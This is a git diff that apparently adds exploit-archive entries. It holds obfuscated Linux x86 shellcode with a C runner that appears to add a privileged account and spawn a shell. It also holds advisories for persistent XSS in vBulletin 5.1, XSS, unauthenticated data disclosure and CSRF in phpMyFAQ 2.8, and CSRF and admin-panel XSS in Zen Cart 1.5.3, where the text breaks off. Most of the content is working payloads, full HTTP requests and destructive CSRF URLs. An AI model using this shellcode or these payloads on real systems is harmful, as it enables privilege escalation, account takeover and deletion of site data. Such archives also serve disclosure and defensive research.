+ 46: bb 53 49 57 4a mov $0x4a574953,%ebx
+ 4b: ba 39 2d 38 3d mov $0x3d382d39,%edx
+ 50: 31 d3 xor %edx,%ebx
+ 52: c1 eb 08 shr $0x8,%ebx
+ 55: 53 push %ebx
+ 56: bb 6d 47 45 58 mov $0x5845476d,%ebx
+ 5b: ba 42 34 2d 39 mov $0x392d3442,%edx
+ 60: 31 d3 xor %edx,%ebx
+ 62: 53 push %ebx
+ 63: bb 6e 54 49 57 mov $0x5749546e,%ebx
+ 68: ba 41 31 3d 34 mov $0x343d3141,%edx
+ 6d: 31 d3 xor %edx,%ebx
+ 6f: 53 push %ebx
+ 70: 89 e3 mov %esp,%ebx
+ 72: 68 41 41 ff 01 push $0x1ff4141
+ 77: 59 pop %ecx
+ 78: c1 e9 08 shr $0x8,%ecx
+ 7b: c1 e9 08 shr $0x8,%ecx
+ 7e: 6a 0f push $0xf
+ 80: 58 pop %eax
+ 81: cd 80 int $0x80
+ 83: bb 73 47 4e 51 mov $0x514e4773,%ebx
+ 88: ba 32 34 39 35 mov $0x35393432,%edx
+ 8d: 31 d3 xor %edx,%ebx
+ 8f: c1 eb 08 shr $0x8,%ebx
+ 92: 53 push %ebx
+ 93: bb 59 44 56 44 mov $0x44564459,%ebx
+ 98: ba 76 34 37 37 mov $0x37373476,%edx
+ 9d: 31 d3 xor %edx,%ebx
+ 9f: 53 push %ebx
+ a0: bb 4e 58 59 51 mov $0x5159584e,%ebx
+ a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx
+ aa: 31 d3 xor %edx,%ebx
+ ac: 53 push %ebx
+ ad: 89 e3 mov %esp,%ebx
+ af: 68 41 41 01 04 push $0x4014141
+ b4: 59 pop %ecx
+ b5: c1 e9 08 shr $0x8,%ecx
+ b8: c1 e9 08 shr $0x8,%ecx
+ bb: 6a 05 push $0x5
+ bd: 58 pop %eax
+ be: cd 80 int $0x80
+ c0: 89 c3 mov %eax,%ebx
+ c2: 6a 04 push $0x4
+ c4: 58 pop %eax
+ c5: 68 41 73 68 0a push $0xa687341
+ ca: 59 pop %ecx
+ cb: c1 e9 08 shr $0x8,%ecx
+ ce: 51 push %ecx
+ cf: b9 57 67 57 58 mov $0x58576757,%ecx
+ d4: ba 39 48 35 39 mov $0x39354839,%edx
+ d9: 31 d1 xor %edx,%ecx
+ db: 51 push %ecx
+ dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx
+ e1: ba 74 4b 38 38 mov $0x38384b74,%edx
+ e6: 31 d1 xor %edx,%ecx
+ e8: 51 push %ecx
+ e9: b9 47 57 56 42 mov $0x42565747,%ecx
+ ee: ba 35 38 39 36 mov $0x36393835,%edx
+ f3: 31 d1 xor %edx,%ecx
+ f5: 51 push %ecx
+ f6: b9 61 70 51 4e mov $0x4e517061,%ecx
+ fb: ba 2d 39 6b 61 mov $0x616b392d,%edx
+ 100: 31 d1 xor %edx,%ecx
+ 102: 51 push %ecx
+ 103: b9 48 58 70 74 mov $0x74705848,%ecx
+ 108: ba 72 68 4a 35 mov $0x354a6872,%edx
+ 10d: 31 d1 xor %edx,%ecx
+ 10f: 51 push %ecx
+ 110: b9 76 45 56 46 mov $0x46564576,%ecx
+ 115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx
+ 11a: 31 d1 xor %edx,%ecx
+ 11c: 51 push %ecx
+ 11d: 68 66 77 55 57 push $0x57557766
+ 122: 68 68 70 31 50 push $0x50317068
+ 127: 68 7a 59 65 41 push $0x4165597a
+ 12c: 68 41 61 41 51 push $0x51416141
+ 131: 68 49 38 75 74 push $0x74753849
+ 136: 68 50 4d 59 68 push $0x68594d50
+ 13b: 68 54 42 74 7a push $0x7a744254
+ 140: 68 51 2f 38 54 push $0x54382f51
+ 145: 68 45 36 6d 67 push $0x676d3645
+ 14a: 68 76 50 2e 73 push $0x732e5076
+ 14f: 68 4e 58 52 37 push $0x3752584e
+ 154: 68 39 4b 55 48 push $0x48554b39
+ 159: 68 72 2f 59 42 push $0x42592f72
+ 15e: 68 56 78 4b 47 push $0x474b7856
+ 163: 68 39 55 66 5a push $0x5a665539
+ 168: 68 46 56 6a 68 push $0x686a5646
+ 16d: 68 46 63 38 79 push $0x79386346
+ 172: 68 70 59 6a 71 push $0x716a5970
+ 177: 68 77 69 53 68 push $0x68536977
+ 17c: 68 6e 54 67 54 push $0x5467546e
+ 181: 68 58 4d 69 37 push $0x37694d58
+ 186: 68 2f 41 6e 24 push $0x246e412f
+ 18b: 68 70 55 6e 4d push $0x4d6e5570
+ 190: 68 24 36 24 6a push $0x6a243624
+ 195: b9 73 61 74 67 mov $0x67746173,%ecx
+ 19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx
+ 19f: 31 d1 xor %edx,%ecx
+ 1a1: 51 push %ecx
+ 1a2: 89 e1 mov %esp,%ecx
+ 1a4: ba 41 41 41 7f mov $0x7f414141,%edx
+ 1a9: c1 ea 08 shr $0x8,%edx
+ 1ac: c1 ea 08 shr $0x8,%edx
+ 1af: c1 ea 08 shr $0x8,%edx
+ 1b2: cd 80 int $0x80
+ 1b4: 31 c0 xor %eax,%eax
+ 1b6: b0 46 mov $0x46,%al
+ 1b8: 31 db xor %ebx,%ebx
+ 1ba: 31 c9 xor %ecx,%ecx
+ 1bc: cd 80 int $0x80
+ 1be: 31 c0 xor %eax,%eax
+ 1c0: b0 46 mov $0x46,%al
+ 1c2: 31 db xor %ebx,%ebx
+ 1c4: 31 c9 xor %ecx,%ecx
+ 1c6: cd 80 int $0x80
+ 1c8: 68 52 55 48 42 push $0x42485552
+ 1cd: 68 52 51 49 43 push $0x43495152
+ 1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx
+ 1d7: ba 66 38 31 35 mov $0x35313866,%edx
+ 1dc: 31 d1 xor %edx,%ecx
+ 1de: 51 push %ecx
+ 1df: b9 55 55 54 57 mov $0x57545555,%ecx
+ 1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx
+ 1e9: 31 d1 xor %edx,%ecx
+ 1eb: 51 push %ecx
+ 1ec: 89 e3 mov %esp,%ebx
+ 1ee: 31 c0 xor %eax,%eax
+ 1f0: 88 43 07 mov %al,0x7(%ebx)
+ 1f3: 89 5b 08 mov %ebx,0x8(%ebx)
+ 1f6: 89 43 0c mov %eax,0xc(%ebx)
+ 1f9: b0 0b mov $0xb,%al
+ 1fb: 8d 4b 08 lea 0x8(%ebx),%ecx
+ 1fe: 8d 53 0c lea 0xc(%ebx),%edx
+ 201: cd 80 int $0x80
+ 203: b0 01 mov $0x1,%al
+ 205: b3 01 mov $0x1,%bl
+ 207: cd 80 int $0x80
+root@g3n3rall:~/Desktop/xpl#
+
+
+
+*/
+
+#include
+#include
+char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
+int main(void)
+{
+
+ fprintf(stdout,"Length: %d\n\n",strlen(sc));
+
+ (*(void(*)()) sc)();
+
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/34579.txt b/platforms/php/webapps/34579.txt
new file mode 100755
index 000000000..6c0784076
--- /dev/null
+++ b/platforms/php/webapps/34579.txt
@@ -0,0 +1,118 @@
+#Title: vBulletin 5.1.X - Cross Site Scripting
+#Date: 05.09.14
+#Version: => 5.1.2 (Latest ATM)
+#Vendor: vbulletin.com
+#Contact: smash [at] devilteam.pl
+
+
+ 1) Agenda
+
+Latest vBulletin forum software suffers on persistent cross site scripting vulnerability, which most likely can be used against every user, such as administrator. Vulnerability is located at user profile page and will be executed whenever someone will visit it.
+
+Solution - proper filtration of image title value, in this case, it's about POST title_13 parameter.
+
+
+ 2) Vulnerability
+
+First step to reproduce the vulnerability, is to create a user account. By then, you should visit profile of the victim.
+
+Let's take as example following address:
+http://vbulletin/member/2-victim
+
+1. Click 'Share photo' (camera icon), pick any image you like.
+
+2. You may add comment about photo, all you need to do is to add js payload.
+
+As comment, use something like - huh" onmouseover=alert(666) xss="
+
+Request:
+POST /ajax/render/editor_gallery_photoblock HTTP/1.1
+Host: vbulletin
+
+photocount=1&photos%5B0%5D%5Bfiledataid%5D=13&photos%5B0%5D%5Btitle%5D=cool%22+onmouseover%3Dalert(666)+xssed%3D%22&securitytoken=[TOKEN]
+
+3. Send image by clicking on 'Post' button.
+
+Request:
+POST /create-content/gallery HTTP/1.1
+Host: vbulletin
+Content-Type: multipart/form-data;
+boundary=---------------------------18897880557155952661558219659
+Content-Length: 1558
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="securitytoken"
+
+1409922799-a28bf50b7ee16f6bfc2b7c652946c366e25574d5
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="text"
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="uploadFrom"
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="filedataid[]"
+
+13
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="title_13"
+
+cool" onmouseover=alert(666) xssed="
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="uploadFrom"
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="securitytoken"
+
+[TOKEN]
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="parentid"
+
+8
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="setfor"
+
+5
+-----------------------------18897880557155952661558219659--
+
+4. Done
+
+At this point, victim should be noticed about new activity via 'Messages' tab:
+"attacker has left you a visitor message"
+
+Basically, you may use this XSS against any profile.
+
+Now, whenever someone will visit profile of victim (ie. http://vbulletin/member/2-victim), he should notice image you uploaded. In this case, js is executed while 'onmouseover', so victim need to click on image.
+
+When victim will click on image, js will be executed, and popup will appear.
+
+Request:
+GET /filedata/gallery?nodeid=31&startIndex=0&securitytoken=[TOKEN] HTTP/1.1
+Host: vbulletin
+
+Response:
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=UTF-8
+
+{"photos":[{"title":"cool\" onmouseover=alert(666) xssed=\"","url":"http:\/\/vbulletin\/filedata\/fetch?photoid=33","thumb":"vbulletin\/filedata\/fetch?photoid=33&thumb=1","links":"Photos By victim.victim@tlen.pl<\/a> in No Title<\/a>
\n"}]}
+
+
+ 3) TL;DR
+
+ - Visit victim profile
+ - Upload any image
+ - XSS in title (asdf" onmouseover=alert(666) xss=")
+ - Send
\ No newline at end of file
diff --git a/platforms/php/webapps/34580.txt b/platforms/php/webapps/34580.txt
new file mode 100755
index 000000000..0288e233b
--- /dev/null
+++ b/platforms/php/webapps/34580.txt
@@ -0,0 +1,207 @@
+#Title: phpMyFAQ 2.8.X - Multiple Vulnerabilities
+#Vendor: phpmyfaq.de
+#Date: 04.09.19
+#Version: >= 2.8.12 (Latest ATM)
+#Tested on: Apache 2.2 / PHP 5.4 / Linux
+#Contact: smash [at] devilteam.pl
+
+
+1) Persistent XSS
+
+Administrator is able to view information about specific user session in 'Statistic' tab. Over there, you may find informations such as user ip, refferer and user agent.
+
+For example, to view informations about session with ID 1, you need visit following address:
+http://localhost/phpmyfaq/admin/?action=viewsession&id=1
+
+Refferer and User Agent variables are not filtered, which allows attacker to inject javascript via those parameters. All you need to do, is to perform particular HTTP request which will contain javascript. For example, if you will produce hundrends of those request, there will be hundrends of Persistent XSS - Victim only needs to visit any of them.
+
+PoC:
+
+alert(666)');
+curl_setopt($ch, CURLOPT_REFERER, '');
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Vuln (viewsession):
+
+
+
+| 2014-09-04 02:22:04 |
+new_session (0) |
+
+
+| Referer: |
+
+
+
+ |
+
+
+| Browser: |
+ |
+
+
+| IP-Address: |
+::1 |
+
+
+
+
+
+2) Remote FAQ Disclosure
+
+Administrator is able to view or download FAQ data using few extensions (xhtml, xml, pdf). Because of no user restrictions, attacker may reproduce this vulnerability to perform those actions even without having an account.
+
+ - Download
+
+
+
+
+
+
+
+ - View
+
+
+
+
+
+
+
+
+
+3) CSRF
+
+ - Edit user credentials (login/mail)
+
+PoC:
+
+
+
+
+
+
+By then, you may generate new password for victim using 'Forgot password' option - just provide your email so you can grab it.
+
+
+ - Delete user
+
+http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=user&ajaxaction=delete_user&user_id=1
+
+
+ - Delete category
+
+http://localhost/phpmyfaq/admin/?action=deletecategory&cat=1&catlang=en
+
+
+ - Delete session (month)
+
+PoC:
+
+
+
+
+
+
+
+ - Delete logs older than 30 days
+
+http://localhost/phpmyfaq/admin/?action=deleteadminlog
+
+
+ - Add stopword
+
+http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=config&ajaxaction=save_stop_word&stopword=lolwut&stopwords_lang=en
+
+
+ - Edit configuration
+
+Affected:
+Main configuration
+FAQ records configuration
+Search
+Security configuration
+Spam control center
+Social network configuration
+
+PoC:
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/34581.txt b/platforms/php/webapps/34581.txt
new file mode 100755
index 000000000..1b9f647a2
--- /dev/null
+++ b/platforms/php/webapps/34581.txt
@@ -0,0 +1,712 @@
+#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
+#Date: 09.07.14
+#Vendor: zen-cart.com
+#Tested on: Apache 2.2 [at] Linux
+#Contact: smash[at]devilteam.pl
+
+#1 - CSRF
+
+- Delete admin
+
+GET profile stands for user id.
+
+localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2
+
+- Reset layout boxes to default
+
+localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults
+
+
+#2 - Persistent XSS in admin panel
+
+Since admin privileges are required to execute following vulnerablities this is not a serious threat.
+
+- Extras -> Media types -> Add
+
+Vulnerable parameters - type_name & type_exit
+
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
+Content-Length: 663
+
+-----------------------------4978676881674017321390852339
+Content-Disposition: form-data; name="securityToken"
+
+b98019227f8014aed6d22b02f0748d11
+-----------------------------4978676881674017321390852339
+Content-Disposition: form-data; name="type_name"
+
+sup